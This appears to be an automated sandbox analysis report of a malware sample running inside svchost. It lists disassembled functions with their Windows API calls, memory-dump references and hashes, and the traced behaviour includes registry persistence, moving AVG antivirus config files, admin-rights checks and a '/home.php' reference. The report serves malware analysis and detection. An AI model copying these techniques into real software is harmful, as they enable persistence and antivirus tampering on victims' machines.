                                                                                                                                                                                                            • Opcode ID: c1c63429beed57e14c7c737aa08adcf76ba01d878508a86c29c37f994b827aff
                                                                                                                                                                                                            • Instruction ID: 3dc0d04ed023514038422d4c70a89f5ca956cc4b8728a668e52f9eeb92603945
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1c63429beed57e14c7c737aa08adcf76ba01d878508a86c29c37f994b827aff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF21DDB1E80A546BEB10E760ECC5FAE72ADEB8071CF200770EE19A70C0D7709981CAD5
                                                                                                                                                                                                            Function 02C86B60 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
                                                                                                                                                                                                            • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
                                                                                                                                                                                                            • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 433761119-0
                                                                                                                                                                                                            • Opcode ID: 0b609fae7a0dbe937c88966c93b64d93a14e5f869262433ddc5deab3e111d806
                                                                                                                                                                                                            • Instruction ID: bcfdb10e190382c844aedb08370d7e2ec974b05cb5c38baabface1b0808283fc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b609fae7a0dbe937c88966c93b64d93a14e5f869262433ddc5deab3e111d806
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15212730800659A7DB11A7689D54BEA7BBCEB5130CF308AE5D94193280EB70DA44CFA0
                                                                                                                                                                                                            Function 02C96FF0 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000,?), ref: 02C97017
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97037
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97048
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97061
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97072
                                                                                                                                                                                                              • Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AB6
                                                                                                                                                                                                              • Part of subcall function 02C97A50: HeapValidate.KERNEL32(00000000), ref: 02C97ABD
                                                                                                                                                                                                              • Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?), ref: 02C97ACA
                                                                                                                                                                                                              • Part of subcall function 02C97A50: HeapFree.KERNEL32(00000000), ref: 02C97AD1
                                                                                                                                                                                                              • Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AE0
                                                                                                                                                                                                              • Part of subcall function 02C97A50: HeapValidate.KERNEL32(00000000), ref: 02C97AE3
                                                                                                                                                                                                              • Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?), ref: 02C97AF0
                                                                                                                                                                                                              • Part of subcall function 02C97A50: HeapFree.KERNEL32(00000000), ref: 02C97AF3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3732962355-0
                                                                                                                                                                                                            • Opcode ID: 2b3ccb1d657ac3d2b086756fef2aa2d9474852e8b5a35f85c6c781cd750fab56
                                                                                                                                                                                                            • Instruction ID: 8afb5dcd38b0cf55b058242d8ad3db136849feb27d825dc79ec1e2b03c97b0de
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b3ccb1d657ac3d2b086756fef2aa2d9474852e8b5a35f85c6c781cd750fab56
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11E6B0A423449BEB21CF65D94C72AFBF8AF85B04F1009ACD845C3241E774DA08CA90
                                                                                                                                                                                                            Function 02C764D0 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,755730D0,75573240,?,02C86C2C,?,00000000,?,?), ref: 02C764FD
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76518
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76523
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,02C86C2C,?,00000000), ref: 02C76542
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,02C86C2C,?,00000000), ref: 02C76553
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Handle$CloseCreateInformationWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1150544999-0
                                                                                                                                                                                                            • Opcode ID: ddcbb96374705cf52cbdecc391bc96d03b85cbcf8ec2711a2cff00bd067f1128
                                                                                                                                                                                                            • Instruction ID: 98b00093aa3a58c397da18543a5d5bb16bafac63a40451ced172bc20f7b26919
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddcbb96374705cf52cbdecc391bc96d03b85cbcf8ec2711a2cff00bd067f1128
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4111C672680A447BE7218A56EC48FAB7B5CEBC5B64F148219FE05C7185C734CA05D771
                                                                                                                                                                                                            Function 02C86B86 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
                                                                                                                                                                                                            • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
                                                                                                                                                                                                            • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 433761119-0
                                                                                                                                                                                                            • Opcode ID: 8e31e683ef9638f6871f9a382b8fa0cc2f018bd0ac6f44603bf784065cfde52e
                                                                                                                                                                                                            • Instruction ID: 68bbfa5dd690334f510e52825f503ac55621b68adebc6cd197fbbc4c1d8dfd3f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e31e683ef9638f6871f9a382b8fa0cc2f018bd0ac6f44603bf784065cfde52e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D119130940A59ABDB21EB64DC48BEA77BCFF5130CF2486A8DA51972C0DB709A54CF61
                                                                                                                                                                                                            Function 02C76060 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C76084
                                                                                                                                                                                                              • Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F72
                                                                                                                                                                                                              • Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F90
                                                                                                                                                                                                              • Part of subcall function 02C75F50: lstrcpynA.KERNEL32(?,?,00000104), ref: 02C75FAD
                                                                                                                                                                                                              • Part of subcall function 02C75F50: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C7601D
                                                                                                                                                                                                              • Part of subcall function 02C75F50: RegSetValueExA.ADVAPI32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C7603F
                                                                                                                                                                                                              • Part of subcall function 02C75F50: RegCloseKey.ADVAPI32(?), ref: 02C7604D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C760B4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C760B7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C760C4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C760C7
                                                                                                                                                                                                              • Part of subcall function 02C75C80: memset.MSVCRT ref: 02C75CA0
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CE7
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75CF6
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CFF
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D09
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D27
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D33
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D3C
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D46
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D64
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D71
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D7B
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D86
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexit$Heap$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1120961889-0
                                                                                                                                                                                                            • Opcode ID: e4218edf6ba31e1397917b57c30f898167aba79f535c1c080ad9b59ea0340bec
                                                                                                                                                                                                            • Instruction ID: 1fcf35d9ee1f3b641c989daa45aed02a64f438b58484f111065045de3195ad55
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4218edf6ba31e1397917b57c30f898167aba79f535c1c080ad9b59ea0340bec
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97F0F032EC46246BCA202AA5AC08F8BBB5CEF807A5F140A12F508D7080CB759065CAE4
                                                                                                                                                                                                            Function 02C769D0 Relevance: 7.5, APIs: 5, Instructions: 20COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,02C8797D,6d1da6b7,?,?,?,?,?,?), ref: 02C769D7
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769E2
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C769EA
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C769F5
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769FC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1233776721-0
                                                                                                                                                                                                            • Opcode ID: b1ecba415cedae85a45a6f4e2ea15c6acc10cec7b8fdc08286130b115ba33829
                                                                                                                                                                                                            • Instruction ID: 029d2a93728ab67eaee32f07bc64c6bb064ad0705db6a9bbf4102762476c0be3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1ecba415cedae85a45a6f4e2ea15c6acc10cec7b8fdc08286130b115ba33829
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FD01732E819919BD7131F31EC0CB6F766CBBC5B16F198AA4F842D3040EF34C2128665
                                                                                                                                                                                                            Function 00402330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 0040240F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFolderMovePath
                                                                                                                                                                                                            • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                            • API String ID: 1404575960-1083204512
                                                                                                                                                                                                            • Opcode ID: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
                                                                                                                                                                                                            • Instruction ID: 218ec206f196096905059f0fa712dce574fe6e09d85f3a618a89c2f21692c038
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43214FB45043448FC759CF14EA98B92BBF4BF98300F1581FADA89A73A2D774D944CB98
                                                                                                                                                                                                            Function 02C92F00 Relevance: 6.1, APIs: 4, Instructions: 56timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7742FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3228293703-0
                                                                                                                                                                                                            • Opcode ID: 74d2c5d0289e147a554c2e2df2393a89a28dd9d4837a4e901b2f3e514c150298
                                                                                                                                                                                                            • Instruction ID: 00ae0e0cd36ab9f62e51b22f890fa0752f49c87762c8a4faa31451496eada84c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74d2c5d0289e147a554c2e2df2393a89a28dd9d4837a4e901b2f3e514c150298
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE110A71D51228AB8B11DFD58888AEEBBBCBB4CB10F14468AF955B3240D7715A058BE1
                                                                                                                                                                                                            Function 02C86290 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C85890,00000000,00000000,00000000), ref: 02C862A4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C862BC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C862CD
                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 02C862D5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4233414108-0
                                                                                                                                                                                                            • Opcode ID: d328a97ac5bed89f73c61e0b3d1f8b3cad970d3428fa4f8c58baed391d3095c6
                                                                                                                                                                                                            • Instruction ID: d8b473da1fd9b586a227525e106e6f6449cad00aa78bfcce2198c722376e50d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d328a97ac5bed89f73c61e0b3d1f8b3cad970d3428fa4f8c58baed391d3095c6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFE09B30EC1358B7F3219750DC0EF5A7A5C9F01B0AF2441D0F905A71C0C7F0A6108665
                                                                                                                                                                                                            Function 02C82D20 Relevance: 6.0, APIs: 4, Instructions: 18memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,6F8890B0,02C7FB89), ref: 02C82D2E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C82D31
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82D3E
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 02C82D41
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 07c29e088f6407a3c1b671805ce8a7680b473906e45e3321fa095ff160c14e2b
                                                                                                                                                                                                            • Instruction ID: be8f1778965c0c07a9d66c456fb5c780ad26caee6bc2a9a65f3407831dee69f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07c29e088f6407a3c1b671805ce8a7680b473906e45e3321fa095ff160c14e2b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96D0C931F892E476D66236A67C0CF5B6E1CDFC1B56F098A42F909DB094DB609111C9B2
                                                                                                                                                                                                            Function 02C835A0 Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                              • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                              • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                              • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,75570F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835F8
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,00000000,75570F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835FB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,75570F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C83608
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000000,75570F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C8360B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 789118668-0
                                                                                                                                                                                                            • Opcode ID: 6ac6e39874d9b8a87fc39220fb479dd2fe0c69e0d2da136d3b06b31e35e5977b
                                                                                                                                                                                                            • Instruction ID: bf5478c376627f2509143d8bfa76f969eb437a9b52595ec0a6831fcc23554143
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ac6e39874d9b8a87fc39220fb479dd2fe0c69e0d2da136d3b06b31e35e5977b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23012431F892801ADF116B3D686073AABDA9FC2968B0C92DAE446C7280D722C9008340
                                                                                                                                                                                                            Function 02C97090 Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000000,?,?,02C975F3), ref: 02C970CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: e0b0319cb903f30aaee89296e4cc31b7d61303c5611d790538c0c254949ea6e6
                                                                                                                                                                                                            • Instruction ID: 0c918c480530b2e208f2bf5f63c3885e27971d0dfa48691c777c5f3d850b4b0e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0b0319cb903f30aaee89296e4cc31b7d61303c5611d790538c0c254949ea6e6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5811E9B2A413445BDB209E6DECC576AF7ECEB84225F1009BEE949C3640C37199448650
